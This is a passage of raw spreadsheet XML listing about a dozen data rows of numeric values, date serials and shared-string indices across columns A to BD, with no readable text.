      <c r="S184">
        <v>1</v>
      </c>
      <c r="T184">
        <v>1</v>
      </c>
      <c r="U184">
        <v>0</v>
      </c>
      <c r="V184">
        <v>0</v>
      </c>
      <c r="W184">
        <v>0</v>
      </c>
      <c r="X184">
        <v>0</v>
      </c>
      <c r="Y184">
        <v>0</v>
      </c>
      <c r="Z184">
        <v>0</v>
      </c>
      <c r="AA184">
        <v>0</v>
      </c>
      <c r="AB184">
        <v>0</v>
      </c>
      <c r="AC184">
        <v>0</v>
      </c>
      <c r="AD184">
        <v>1</v>
      </c>
      <c r="AE184">
        <v>10000</v>
      </c>
      <c r="AF184" t="s">
        <v>1615</v>
      </c>
      <c r="AG184">
        <v>14450</v>
      </c>
      <c r="AH184">
        <v>12</v>
      </c>
      <c r="AJ184">
        <v>160</v>
      </c>
      <c r="AK184" t="s">
        <v>114</v>
      </c>
      <c r="AL184" t="s">
        <v>1616</v>
      </c>
      <c r="AM184" t="s">
        <v>1617</v>
      </c>
      <c r="AN184" t="s">
        <v>55</v>
      </c>
      <c r="AO184">
        <v>2016</v>
      </c>
      <c r="AP184" s="4">
        <v>216696371</v>
      </c>
      <c r="AQ184" t="s">
        <v>1618</v>
      </c>
      <c r="AR184" t="s">
        <v>1615</v>
      </c>
      <c r="AS184" t="s">
        <v>71</v>
      </c>
      <c r="AT184" t="s">
        <v>58</v>
      </c>
      <c r="AU184">
        <v>24</v>
      </c>
      <c r="AV184">
        <v>1</v>
      </c>
      <c r="AW184">
        <v>4</v>
      </c>
      <c r="AX184">
        <v>0</v>
      </c>
      <c r="AY184">
        <v>7</v>
      </c>
      <c r="AZ184">
        <v>2</v>
      </c>
      <c r="BA184" t="s">
        <v>16593</v>
      </c>
      <c r="BB184" t="s">
        <v>14251</v>
      </c>
      <c r="BC184">
        <v>0</v>
      </c>
      <c r="BD184" t="s">
        <v>11198</v>
      </c>
    </row>
    <row r="185" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A185">
        <v>427</v>
      </c>
      <c r="B185" t="s">
        <v>1619</v>
      </c>
      <c r="C185" t="s">
        <v>99</v>
      </c>
      <c r="D185" t="s">
        <v>1620</v>
      </c>
      <c r="E185" t="s">
        <v>412</v>
      </c>
      <c r="F185" t="s">
        <v>1621</v>
      </c>
      <c r="G185" s="1">
        <v>44116</v>
      </c>
      <c r="H185">
        <v>4614</v>
      </c>
      <c r="I185">
        <v>4614</v>
      </c>
      <c r="J185">
        <v>1</v>
      </c>
      <c r="K185">
        <v>0</v>
      </c>
      <c r="L185">
        <v>1</v>
      </c>
      <c r="M185">
        <v>0</v>
      </c>
      <c r="N185">
        <v>0</v>
      </c>
      <c r="O185">
        <v>0</v>
      </c>
      <c r="P185">
        <v>0</v>
      </c>
      <c r="Q185">
        <v>0</v>
      </c>
      <c r="R185">
        <v>0</v>
      </c>
      <c r="S185">
        <v>0</v>
      </c>
      <c r="T185">
        <v>0</v>
      </c>
      <c r="U185">
        <v>150000</v>
      </c>
      <c r="V185">
        <v>0</v>
      </c>
      <c r="W185">
        <v>5000</v>
      </c>
      <c r="X185">
        <v>0</v>
      </c>
      <c r="Y185">
        <v>0</v>
      </c>
      <c r="Z185">
        <v>0</v>
      </c>
      <c r="AA185">
        <v>0</v>
      </c>
      <c r="AB185">
        <v>0</v>
      </c>
      <c r="AC185">
        <v>0</v>
      </c>
      <c r="AD185">
        <v>0</v>
      </c>
      <c r="AE185">
        <v>0</v>
      </c>
      <c r="AF185" t="s">
        <v>1622</v>
      </c>
      <c r="AG185">
        <v>14440</v>
      </c>
      <c r="AH185">
        <v>12</v>
      </c>
      <c r="AJ185">
        <v>160</v>
      </c>
      <c r="AK185" t="s">
        <v>114</v>
      </c>
      <c r="AL185" t="s">
        <v>114</v>
      </c>
      <c r="AM185" t="s">
        <v>1623</v>
      </c>
      <c r="AN185" t="s">
        <v>55</v>
      </c>
      <c r="AO185">
        <v>2017</v>
      </c>
      <c r="AP185">
        <v>2166604649</v>
      </c>
      <c r="AQ185" t="s">
        <v>1624</v>
      </c>
      <c r="AR185" t="s">
        <v>1625</v>
      </c>
      <c r="AS185" t="s">
        <v>71</v>
      </c>
      <c r="AT185" t="s">
        <v>58</v>
      </c>
      <c r="AU185">
        <v>25</v>
      </c>
      <c r="AV185">
        <v>1</v>
      </c>
      <c r="AW185">
        <v>6</v>
      </c>
      <c r="AX185">
        <v>0</v>
      </c>
      <c r="AY185">
        <v>4</v>
      </c>
      <c r="AZ185">
        <v>2</v>
      </c>
      <c r="BA185" t="s">
        <v>16687</v>
      </c>
      <c r="BB185" t="s">
        <v>14563</v>
      </c>
      <c r="BC185" t="s">
        <v>11330</v>
      </c>
      <c r="BD185" t="s">
        <v>10170</v>
      </c>
    </row>
    <row r="186" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A186">
        <v>469</v>
      </c>
      <c r="B186" t="s">
        <v>1626</v>
      </c>
      <c r="C186" t="s">
        <v>99</v>
      </c>
      <c r="D186" t="s">
        <v>1627</v>
      </c>
      <c r="E186" t="s">
        <v>101</v>
      </c>
      <c r="F186" t="s">
        <v>1628</v>
      </c>
      <c r="G186" s="1">
        <v>44075</v>
      </c>
      <c r="H186">
        <v>4641</v>
      </c>
      <c r="I186">
        <v>4641</v>
      </c>
      <c r="J186">
        <v>2</v>
      </c>
      <c r="K186">
        <v>1</v>
      </c>
      <c r="L186">
        <v>1</v>
      </c>
      <c r="M186">
        <v>0</v>
      </c>
      <c r="N186">
        <v>0</v>
      </c>
      <c r="O186">
        <v>2</v>
      </c>
      <c r="P186">
        <v>0</v>
      </c>
      <c r="Q186">
        <v>20</v>
      </c>
      <c r="R186">
        <v>50</v>
      </c>
      <c r="S186">
        <v>1</v>
      </c>
      <c r="T186">
        <v>1</v>
      </c>
      <c r="U186">
        <v>300000</v>
      </c>
      <c r="V186">
        <v>1</v>
      </c>
      <c r="W186">
        <v>20000</v>
      </c>
      <c r="X186">
        <v>0</v>
      </c>
      <c r="Y186">
        <v>0</v>
      </c>
      <c r="Z186">
        <v>2</v>
      </c>
      <c r="AA186">
        <v>0</v>
      </c>
      <c r="AB186">
        <v>20</v>
      </c>
      <c r="AC186">
        <v>25000</v>
      </c>
      <c r="AD186">
        <v>1</v>
      </c>
      <c r="AE186">
        <v>30000</v>
      </c>
      <c r="AF186" t="s">
        <v>1629</v>
      </c>
      <c r="AG186">
        <v>14440</v>
      </c>
      <c r="AH186">
        <v>12</v>
      </c>
      <c r="AJ186">
        <v>160</v>
      </c>
      <c r="AK186" t="s">
        <v>114</v>
      </c>
      <c r="AL186" t="s">
        <v>114</v>
      </c>
      <c r="AM186" t="s">
        <v>1630</v>
      </c>
      <c r="AN186" t="s">
        <v>55</v>
      </c>
      <c r="AO186">
        <v>2000</v>
      </c>
      <c r="AP186" t="s">
        <v>1631</v>
      </c>
      <c r="AQ186" t="s">
        <v>1632</v>
      </c>
      <c r="AR186" t="s">
        <v>1633</v>
      </c>
      <c r="AU186">
        <v>26</v>
      </c>
      <c r="AV186">
        <v>0</v>
      </c>
      <c r="AW186">
        <v>22</v>
      </c>
      <c r="AX186">
        <v>25</v>
      </c>
      <c r="AY186">
        <v>27</v>
      </c>
      <c r="AZ186">
        <v>21</v>
      </c>
      <c r="BA186" t="s">
        <v>17381</v>
      </c>
      <c r="BB186" t="s">
        <v>14600</v>
      </c>
      <c r="BC186" t="s">
        <v>11340</v>
      </c>
      <c r="BD186" t="s">
        <v>10738</v>
      </c>
    </row>
    <row r="187" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A187">
        <v>622</v>
      </c>
      <c r="B187" t="s">
        <v>1634</v>
      </c>
      <c r="C187" t="s">
        <v>99</v>
      </c>
      <c r="D187" t="s">
        <v>1635</v>
      </c>
      <c r="E187" t="s">
        <v>142</v>
      </c>
      <c r="F187" t="s">
        <v>666</v>
      </c>
      <c r="G187" s="1">
        <v>44081</v>
      </c>
      <c r="H187">
        <v>4650</v>
      </c>
      <c r="I187">
        <v>4650</v>
      </c>
      <c r="J187">
        <v>1</v>
      </c>
      <c r="K187">
        <v>0</v>
      </c>
      <c r="L187">
        <v>0</v>
      </c>
      <c r="M187">
        <v>0</v>
      </c>
      <c r="N187">
        <v>0</v>
      </c>
      <c r="O187">
        <v>0</v>
      </c>
      <c r="P187">
        <v>0</v>
      </c>
      <c r="Q187">
        <v>0</v>
      </c>
      <c r="R187">
        <v>0</v>
      </c>
      <c r="S187">
        <v>0</v>
      </c>
      <c r="T187">
        <v>0</v>
      </c>
      <c r="U187">
        <v>125</v>
      </c>
      <c r="V187">
        <v>0</v>
      </c>
      <c r="W187">
        <v>0</v>
      </c>
      <c r="X187">
        <v>0</v>
      </c>
      <c r="Y187">
        <v>0</v>
      </c>
      <c r="Z187">
        <v>0</v>
      </c>
      <c r="AA187">
        <v>0</v>
      </c>
      <c r="AB187">
        <v>0</v>
      </c>
      <c r="AC187">
        <v>0</v>
      </c>
      <c r="AD187">
        <v>0</v>
      </c>
      <c r="AE187">
        <v>0</v>
      </c>
      <c r="AF187" t="s">
        <v>1634</v>
      </c>
      <c r="AG187">
        <v>14440</v>
      </c>
      <c r="AH187">
        <v>12</v>
      </c>
      <c r="AJ187">
        <v>160</v>
      </c>
      <c r="AK187" t="s">
        <v>114</v>
      </c>
      <c r="AL187" t="s">
        <v>114</v>
      </c>
      <c r="AM187" t="s">
        <v>1636</v>
      </c>
      <c r="AN187" t="s">
        <v>68</v>
      </c>
      <c r="AO187">
        <v>2016</v>
      </c>
      <c r="AP187" t="s">
        <v>1637</v>
      </c>
      <c r="AQ187" t="s">
        <v>1638</v>
      </c>
      <c r="AR187" t="s">
        <v>1639</v>
      </c>
      <c r="AS187" t="s">
        <v>179</v>
      </c>
      <c r="AT187" t="s">
        <v>72</v>
      </c>
      <c r="AU187">
        <v>27</v>
      </c>
      <c r="AV187">
        <v>1</v>
      </c>
      <c r="AW187">
        <v>12</v>
      </c>
      <c r="AX187">
        <v>0</v>
      </c>
      <c r="AY187">
        <v>2</v>
      </c>
      <c r="AZ187">
        <v>1</v>
      </c>
      <c r="BA187" t="s">
        <v>17430</v>
      </c>
      <c r="BB187" t="s">
        <v>14726</v>
      </c>
      <c r="BC187" t="s">
        <v>11345</v>
      </c>
      <c r="BD187">
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A188">
        <v>594</v>
      </c>
      <c r="B188" t="s">
        <v>1640</v>
      </c>
      <c r="C188" t="s">
        <v>74</v>
      </c>
      <c r="D188" t="s">
        <v>1641</v>
      </c>
      <c r="E188" t="s">
        <v>142</v>
      </c>
      <c r="F188" t="s">
        <v>1642</v>
      </c>
      <c r="G188" s="1">
        <v>44300</v>
      </c>
      <c r="H188">
        <v>4657</v>
      </c>
      <c r="I188">
        <v>4657</v>
      </c>
      <c r="J188">
        <v>2</v>
      </c>
      <c r="K188">
        <v>0</v>
      </c>
      <c r="L188">
        <v>1</v>
      </c>
      <c r="M188">
        <v>0</v>
      </c>
      <c r="N188">
        <v>0</v>
      </c>
      <c r="O188">
        <v>0</v>
      </c>
      <c r="P188">
        <v>0</v>
      </c>
      <c r="Q188">
        <v>3</v>
      </c>
      <c r="R188">
        <v>10</v>
      </c>
      <c r="S188">
        <v>0</v>
      </c>
      <c r="T188">
        <v>1</v>
      </c>
      <c r="U188">
        <v>500000</v>
      </c>
      <c r="V188">
        <v>0</v>
      </c>
      <c r="W188">
        <v>5000</v>
      </c>
      <c r="X188">
        <v>0</v>
      </c>
      <c r="Y188">
        <v>0</v>
      </c>
      <c r="Z188">
        <v>0</v>
      </c>
      <c r="AA188">
        <v>0</v>
      </c>
      <c r="AB188">
        <v>200</v>
      </c>
      <c r="AC188">
        <v>2000</v>
      </c>
      <c r="AD188">
        <v>0</v>
      </c>
      <c r="AE188">
        <v>200000</v>
      </c>
      <c r="AF188" t="s">
        <v>1643</v>
      </c>
      <c r="AG188">
        <v>51216</v>
      </c>
      <c r="AH188">
        <v>14</v>
      </c>
      <c r="AJ188">
        <v>212</v>
      </c>
      <c r="AK188" t="s">
        <v>1644</v>
      </c>
      <c r="AL188" t="s">
        <v>1645</v>
      </c>
      <c r="AM188" t="s">
        <v>1646</v>
      </c>
      <c r="AN188" t="s">
        <v>55</v>
      </c>
      <c r="AO188">
        <v>2017</v>
      </c>
      <c r="AP188" t="s">
        <v>1647</v>
      </c>
      <c r="AQ188" t="s">
        <v>1648</v>
      </c>
      <c r="AR188" t="s">
        <v>1643</v>
      </c>
      <c r="AS188" t="s">
        <v>71</v>
      </c>
      <c r="AT188" t="s">
        <v>58</v>
      </c>
      <c r="AU188">
        <v>24</v>
      </c>
      <c r="AV188">
        <v>1</v>
      </c>
      <c r="AW188">
        <v>4</v>
      </c>
      <c r="AX188">
        <v>16</v>
      </c>
      <c r="AY188">
        <v>6</v>
      </c>
      <c r="AZ188">
        <v>2</v>
      </c>
      <c r="BA188" t="s">
        <v>16722</v>
      </c>
      <c r="BB188" t="s">
        <v>14704</v>
      </c>
      <c r="BC188">
        <v>0</v>
      </c>
      <c r="BD188" t="s">
        <v>13101</v>
      </c>
    </row>
    <row r="189" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A189">
        <v>332</v>
      </c>
      <c r="B189" t="s">
        <v>1649</v>
      </c>
      <c r="C189" t="s">
        <v>88</v>
      </c>
      <c r="D189" t="s">
        <v>1650</v>
      </c>
      <c r="E189" t="s">
        <v>944</v>
      </c>
      <c r="F189" t="s">
        <v>1651</v>
      </c>
      <c r="G189" s="1">
        <v>44337</v>
      </c>
      <c r="H189">
        <v>4697</v>
      </c>
      <c r="I189">
        <v>4697</v>
      </c>
      <c r="J189">
        <v>4</v>
      </c>
      <c r="K189">
        <v>12</v>
      </c>
      <c r="L189">
        <v>2</v>
      </c>
      <c r="M189">
        <v>0</v>
      </c>
      <c r="N189">
        <v>0</v>
      </c>
      <c r="O189">
        <v>0</v>
      </c>
      <c r="P189">
        <v>4</v>
      </c>
      <c r="Q189">
        <v>6</v>
      </c>
      <c r="R189">
        <v>3</v>
      </c>
      <c r="S189">
        <v>10</v>
      </c>
      <c r="T189">
        <v>1</v>
      </c>
      <c r="U189">
        <v>400000</v>
      </c>
      <c r="V189">
        <v>12000</v>
      </c>
      <c r="W189">
        <v>20000</v>
      </c>
      <c r="X189">
        <v>0</v>
      </c>
      <c r="Y189">
        <v>0</v>
      </c>
      <c r="Z189">
        <v>0</v>
      </c>
      <c r="AA189">
        <v>8750</v>
      </c>
      <c r="AB189">
        <v>113400</v>
      </c>
      <c r="AC189">
        <v>94500</v>
      </c>
      <c r="AD189">
        <v>246200</v>
      </c>
      <c r="AE189">
        <v>8000000</v>
      </c>
      <c r="AF189" t="s">
        <v>1652</v>
      </c>
      <c r="AG189">
        <v>82218</v>
      </c>
      <c r="AH189">
        <v>17</v>
      </c>
      <c r="AJ189">
        <v>274</v>
      </c>
      <c r="AK189" t="s">
        <v>1058</v>
      </c>
      <c r="AL189" t="s">
        <v>1457</v>
      </c>
      <c r="AM189" t="s">
        <v>1653</v>
      </c>
      <c r="AN189" t="s">
        <v>55</v>
      </c>
      <c r="AO189">
        <v>1999</v>
      </c>
      <c r="AP189">
        <v>36541868</v>
      </c>
      <c r="AQ189" t="s">
        <v>1654</v>
      </c>
      <c r="AR189" t="s">
        <v>1655</v>
      </c>
      <c r="AS189" t="s">
        <v>71</v>
      </c>
      <c r="AT189" t="s">
        <v>58</v>
      </c>
      <c r="AU189">
        <v>25</v>
      </c>
      <c r="AV189">
        <v>0</v>
      </c>
      <c r="AW189">
        <v>160</v>
      </c>
      <c r="AX189">
        <v>110</v>
      </c>
      <c r="AY189">
        <v>67</v>
      </c>
      <c r="AZ189">
        <v>27</v>
      </c>
      <c r="BA189" t="s">
        <v>16667</v>
      </c>
      <c r="BB189" t="s">
        <v>14310</v>
      </c>
      <c r="BC189" t="s">
        <v>13880</v>
      </c>
      <c r="BD189" t="s">
        <v>12096</v>
      </c>
    </row>
    <row r="190" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A190">
        <v>564</v>
      </c>
      <c r="B190" t="s">
        <v>1656</v>
      </c>
      <c r="C190" t="s">
        <v>607</v>
      </c>
      <c r="D190" t="s">
        <v>1657</v>
      </c>
      <c r="E190" t="s">
        <v>142</v>
      </c>
      <c r="F190" t="s">
        <v>673</v>
      </c>
      <c r="G190" s="1">
        <v>44110</v>
      </c>
      <c r="H190">
        <v>4747</v>
      </c>
      <c r="I190">
        <v>4747</v>
      </c>
      <c r="J190">
        <v>2</v>
      </c>
      <c r="K190">
        <v>0</v>
      </c>
      <c r="L190">
        <v>0</v>
      </c>
      <c r="M190">
        <v>2</v>
      </c>
      <c r="N190">
        <v>0</v>
      </c>
      <c r="O190">
        <v>0</v>
      </c>
      <c r="P190">
        <v>0</v>
      </c>
      <c r="Q190">
        <v>0</v>
      </c>
      <c r="R190">
        <v>94</v>
      </c>
      <c r="S190">
        <v>0</v>
      </c>
      <c r="T190">
        <v>0</v>
      </c>
      <c r="U190">
        <v>200000</v>
      </c>
      <c r="V190">
        <v>0</v>
      </c>
      <c r="W190">
        <v>0</v>
      </c>
      <c r="X190">
        <v>1130</v>
      </c>
      <c r="Y190">
        <v>0</v>
      </c>
      <c r="Z190">
        <v>0</v>
      </c>
      <c r="AA190">
        <v>0</v>
      </c>
      <c r="AB190">
        <v>0</v>
      </c>
      <c r="AC190">
        <v>26850</v>
      </c>
      <c r="AD190">
        <v>0</v>
      </c>
      <c r="AE190">
        <v>0</v>
      </c>
      <c r="AF190" t="s">
        <v>1658</v>
      </c>
      <c r="AG190">
        <v>77116</v>
      </c>
      <c r="AH190">
        <v>24</v>
      </c>
      <c r="AJ190">
        <v>370</v>
      </c>
      <c r="AK190" t="s">
        <v>611</v>
      </c>
      <c r="AL190" t="s">
        <v>612</v>
      </c>
      <c r="AM190" t="s">
        <v>1659</v>
      </c>
      <c r="AN190" t="s">
        <v>82</v>
      </c>
      <c r="AO190">
        <v>2010</v>
      </c>
      <c r="AP190" t="s">
        <v>1660</v>
      </c>
      <c r="AQ190" t="s">
        <v>1661</v>
      </c>
      <c r="AR190" t="s">
        <v>1662</v>
      </c>
      <c r="AS190" t="s">
        <v>71</v>
      </c>
      <c r="AT190" t="s">
        <v>86</v>
      </c>
      <c r="AU190">
        <v>28</v>
      </c>
      <c r="AV190">
        <v>1</v>
      </c>
      <c r="AW190">
        <v>64</v>
      </c>
      <c r="AX190">
        <v>92</v>
      </c>
      <c r="AY190">
        <v>12</v>
      </c>
      <c r="AZ190">
        <v>6</v>
      </c>
      <c r="BA190" t="s">
        <v>17241</v>
      </c>
      <c r="BB190" t="s">
        <v>14677</v>
      </c>
      <c r="BC190">
        <v>0</v>
      </c>
      <c r="BD190" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="191" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A191">
        <v>569</v>
      </c>
      <c r="B191" t="s">
        <v>1663</v>
      </c>
      <c r="C191" t="s">
        <v>579</v>
      </c>
      <c r="D191" t="s">
        <v>1664</v>
      </c>
      <c r="E191" t="s">
        <v>916</v>
      </c>
      <c r="F191" t="s">
        <v>1665</v>
      </c>
      <c r="G191" s="1">
        <v>44356</v>
      </c>
      <c r="H191">
        <v>4775</v>
      </c>
      <c r="I191">
        <v>4775</v>
      </c>
      <c r="J191">
        <v>0</v>
      </c>
      <c r="K191">
        <v>0</v>
      </c>
      <c r="L191">
        <v>0</v>
      </c>
      <c r="M191">
        <v>2</v>
      </c>
      <c r="N191">
        <v>10</v>
      </c>
      <c r="O191">
        <v>0</v>
      </c>
      <c r="P191">
        <v>1</v>
      </c>
      <c r="Q191">
        <v>3</v>
      </c>
      <c r="R191">
        <v>3</v>
      </c>
      <c r="S191">
        <v>0</v>
      </c>
      <c r="T191">
        <v>2</v>
      </c>
      <c r="U191">
        <v>0</v>
      </c>
      <c r="V191">
        <v>0</v>
      </c>
      <c r="W191">
        <v>0</v>
      </c>
      <c r="X191">
        <v>150</v>
      </c>
      <c r="Y191">
        <v>0</v>
      </c>
      <c r="Z191">
        <v>0</v>
      </c>
      <c r="AA191">
        <v>1</v>
      </c>
      <c r="AB191">
        <v>60</v>
      </c>
      <c r="AC191">
        <v>30</v>
      </c>
      <c r="AD191">
        <v>0</v>
      </c>
      <c r="AE191">
        <v>500</v>
      </c>
      <c r="AF191" t="s">
        <v>1666</v>
      </c>
      <c r="AG191">
        <v>76125</v>
      </c>
      <c r="AH191">
        <v>23</v>
      </c>
      <c r="AJ191">
        <v>363</v>
      </c>
      <c r="AK191" t="s">
        <v>1667</v>
      </c>
      <c r="AL191" t="s">
        <v>1668</v>
      </c>
      <c r="AM191" t="s">
        <v>1669</v>
      </c>
      <c r="AN191" t="s">
        <v>68</v>
      </c>
      <c r="AO191">
        <v>2012</v>
      </c>
      <c r="AP191">
        <v>542730629</v>
      </c>
      <c r="AQ191" t="s">
        <v>1670</v>
      </c>
      <c r="AR191" t="s">
        <v>1666</v>
      </c>
      <c r="AS191" t="s">
        <v>71</v>
      </c>
      <c r="AT191" t="s">
        <v>72</v>
      </c>
      <c r="AU191">
        <v>24</v>
      </c>
      <c r="AV191">
        <v>0</v>
      </c>
      <c r="AW191">
        <v>0</v>
      </c>
      <c r="AX191">
        <v>8</v>
      </c>
      <c r="AY191">
        <v>5</v>
      </c>
      <c r="AZ191">
        <v>5</v>
      </c>
      <c r="BA191" t="s">
        <v>17438</v>
      </c>
      <c r="BB191" t="s">
        <v>14681</v>
      </c>
      <c r="BC191" t="s">
        <v>10345</v>
      </c>
      <c r="BD191">
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A192">
        <v>777</v>
      </c>
      <c r="B192" t="s">
        <v>1671</v>
      </c>
      <c r="C192" t="s">
        <v>1672</v>
      </c>
      <c r="D192" t="s">
        <v>1673</v>
      </c>
      <c r="E192" t="s">
        <v>843</v>
      </c>
      <c r="F192" t="s">
        <v>1674</v>
      </c>
      <c r="G192" s="1">
        <v>44050</v>
      </c>
      <c r="H192">
        <v>4786</v>
      </c>
      <c r="I192">
        <v>4786</v>
      </c>
      <c r="J192">
        <v>0</v>
      </c>
      <c r="K192">
        <v>1</v>
      </c>
      <c r="L192">
        <v>0</v>
      </c>
      <c r="M192">
        <v>0</v>
      </c>
      <c r="N192">
        <v>0</v>
      </c>
      <c r="O192">
        <v>0</v>
      </c>
      <c r="P192">
        <v>0</v>
      </c>
      <c r="Q192">
        <v>0</v>
      </c>
      <c r="R192">
        <v>0</v>
      </c>
      <c r="S192">
        <v>1</v>
      </c>
      <c r="T192">
        <v>0</v>
      </c>
      <c r="U192">
        <v>0</v>
      </c>
      <c r="V192">
        <v>30</v>
      </c>
      <c r="W192">
        <v>0</v>
      </c>
      <c r="X192">
        <v>0</v>
      </c>
      <c r="Y192">
        <v>0</v>
      </c>
      <c r="Z192">
        <v>0</v>
      </c>
      <c r="AA192">
        <v>0</v>
      </c>
      <c r="AB192">
        <v>0</v>
      </c>
      <c r="AC192">
        <v>0</v>
      </c>
      <c r="AD192">
        <v>1</v>
      </c>
      <c r="AE192">
        <v>0</v>
      </c>
      <c r="AF192" t="s">
        <v>1675</v>
      </c>
      <c r="AG192">
        <v>70861</v>
      </c>
      <c r="AH192">
        <v>22</v>
      </c>
      <c r="AJ192">
        <v>343</v>
      </c>
      <c r="AK192" t="s">
        <v>1676</v>
      </c>
      <c r="AL192" t="s">
        <v>1677</v>
      </c>
      <c r="AM192" t="s">
        <v>1678</v>
      </c>
      <c r="AN192" t="s">
        <v>68</v>
      </c>
      <c r="AO192">
        <v>2017</v>
      </c>
      <c r="AP192">
        <v>82251866668</v>
      </c>
      <c r="AQ192" t="s">
        <v>1679</v>
      </c>
      <c r="AR192" t="s">
        <v>1675</v>
      </c>
      <c r="AS192" t="s">
        <v>71</v>
      </c>
      <c r="AT192" t="s">
        <v>58</v>
      </c>
      <c r="AU192">
        <v>0</v>
      </c>
      <c r="AV192">
        <v>0</v>
      </c>
      <c r="AW192">
        <v>0</v>
      </c>
      <c r="AX192">
        <v>25</v>
      </c>
      <c r="AY192">
        <v>5</v>
      </c>
      <c r="AZ192">
        <v>0</v>
      </c>
      <c r="BA192" t="s">
        <v>17392</v>
      </c>
      <c r="BB192" t="s">
        <v>14848</v>
      </c>
      <c r="BC192">
        <v>0</v>
      </c>
      <c r="BD192" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="193" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A193">
        <v>732</v>
      </c>
      <c r="B193" t="s">
        <v>1680</v>
      </c>
      <c r="C193" t="s">
        <v>47</v>
      </c>
      <c r="D193" t="s">
        <v>1681</v>
      </c>
      <c r="E193" t="s">
        <v>300</v>
      </c>
      <c r="F193" t="s">
        <v>1682</v>
      </c>
      <c r="G193" s="1">
        <v>44085</v>
      </c>
      <c r="H193">
        <v>4824</v>
      </c>
      <c r="I193">
        <v>4824</v>
      </c>
      <c r="J193">
        <v>2</v>
      </c>
      <c r="K193">
        <v>0</v>
      </c>
      <c r="L193">
        <v>2</v>
      </c>
      <c r="M193">
        <v>0</v>
      </c>
      <c r="N193">
        <v>0</v>
      </c>
      <c r="O193">
        <v>0</v>
      </c>
      <c r="P193">
        <v>0</v>
      </c>
      <c r="Q193">
        <v>0</v>
      </c>
      <c r="R193">
        <v>0</v>
      </c>
      <c r="S193">
        <v>0</v>
      </c>
      <c r="T193">
        <v>0</v>
      </c>
      <c r="U193">
        <v>300000</v>
      </c>
      <c r="V193">
        <v>0</v>
      </c>
      <c r="W193">
        <v>3000</v>
      </c>
      <c r="X193">
        <v>0</v>
      </c>
      <c r="Y193">
        <v>0</v>
      </c>
      <c r="Z193">
        <v>0</v>
      </c>
      <c r="AA193">
        <v>0</v>
      </c>
      <c r="AB193">
        <v>0</v>
      </c>
      <c r="AC193">
        <v>0</v>
      </c>
      <c r="AD193">
        <v>0</v>
      </c>
      <c r="AE193">
        <v>0</v>
      </c>
      <c r="AF193" t="s">
        <v>1683</v>
      </c>
      <c r="AG193">
        <v>21333</v>
      </c>
      <c r="AH193">
        <v>2</v>
      </c>
      <c r="AJ193">
        <v>50</v>
      </c>
      <c r="AK193" t="s">
        <v>443</v>
      </c>
      <c r="AL193" t="s">
        <v>1684</v>
      </c>
      <c r="AM193" t="s">
        <v>1685</v>
      </c>
      <c r="AN193" t="s">
        <v>68</v>
      </c>
      <c r="AO193">
        <v>2011</v>
      </c>
      <c r="AP193">
        <v>8126280106</v>
      </c>
      <c r="AQ193" t="s">
        <v>1686</v>
      </c>
      <c r="AR193" t="s">
        <v>1683</v>
      </c>
      <c r="AS193" t="s">
        <v>71</v>
      </c>
      <c r="AT193" t="s">
        <v>72</v>
      </c>
      <c r="AU193">
        <v>30</v>
      </c>
      <c r="AV193">
        <v>1</v>
      </c>
      <c r="AW193">
        <v>8</v>
      </c>
      <c r="AX193">
        <v>12</v>
      </c>
      <c r="AY193">
        <v>0</v>
      </c>
      <c r="AZ193">
        <v>4</v>
      </c>
      <c r="BA193" t="s">
        <v>16748</v>
      </c>
      <c r="BB193" t="s">
        <v>14810</v>
      </c>
      <c r="BC193">
        <v>0</v>
      </c>
      <c r="BD193" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="194" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A194">
        <v>824</v>
      </c>
      <c r="B194" t="s">
        <v>1687</v>
      </c>
      <c r="C194" t="s">
        <v>726</v>
      </c>
      <c r="D194" t="s">
        <v>1688</v>
      </c>
      <c r="E194" t="s">
        <v>142</v>
      </c>
      <c r="F194" t="s">
        <v>1689</v>
      </c>
      <c r="G194" s="1">
        <v>44124</v>
      </c>
      <c r="H194">
        <v>4852</v>
      </c>
      <c r="I194">
        <v>4852</v>
      </c>
      <c r="J194">
        <v>3</v>
      </c>
      <c r="K194">
        <v>2</v>
      </c>
      <c r="L194">
        <v>8</v>
      </c>
      <c r="M194">
        <v>0</v>
      </c>
      <c r="N194">
        <v>0</v>
      </c>
      <c r="O194">
        <v>0</v>
      </c>
      <c r="P194">
        <v>0</v>
      </c>
      <c r="Q194">
        <v>6</v>
      </c>
      <c r="R194">
        <v>10</v>
      </c>
      <c r="S194">
        <v>0</v>
      </c>
      <c r="T194">
        <v>1</v>
      </c>
      <c r="U194">
        <v>1000000</v>
      </c>
      <c r="V194">
        <v>400000</v>
      </c>
      <c r="W194">
        <v>75000</v>
      </c>
      <c r="X194">
        <v>0</v>
      </c>
      <c r="Y194">
        <v>0</v>
      </c>
      <c r="Z194">
        <v>0</v>
      </c>
      <c r="AA194">
        <v>0</v>
      </c>
      <c r="AB194">
        <v>3000</v>
      </c>
      <c r="AC194">
        <v>10000</v>
      </c>
      <c r="AD194">
        <v>0</v>
      </c>
      <c r="AE194">
        <v>200000</v>
      </c>
      <c r="AF194" t="s">
        <v>1690</v>
      </c>
      <c r="AG194">
        <v>97791</v>
      </c>
      <c r="AH194">
        <v>32</v>
      </c>
      <c r="AJ194">
        <v>466</v>
      </c>
      <c r="AK194" t="s">
        <v>730</v>
      </c>
      <c r="AL194" t="s">
        <v>731</v>
      </c>
      <c r="AM194" t="s">
        <v>1691</v>
      </c>
      <c r="AN194" t="s">
        <v>55</v>
      </c>
      <c r="AO194">
        <v>2010</v>
      </c>
      <c r="AP194">
        <v>82347074437</v>
      </c>
      <c r="AQ194" t="s">
        <v>1692</v>
      </c>
      <c r="AR194" t="s">
        <v>1690</v>
      </c>
      <c r="AS194" t="s">
        <v>71</v>
      </c>
      <c r="AT194" t="s">
        <v>58</v>
      </c>
      <c r="AU194">
        <v>26</v>
      </c>
      <c r="AV194">
        <v>0</v>
      </c>
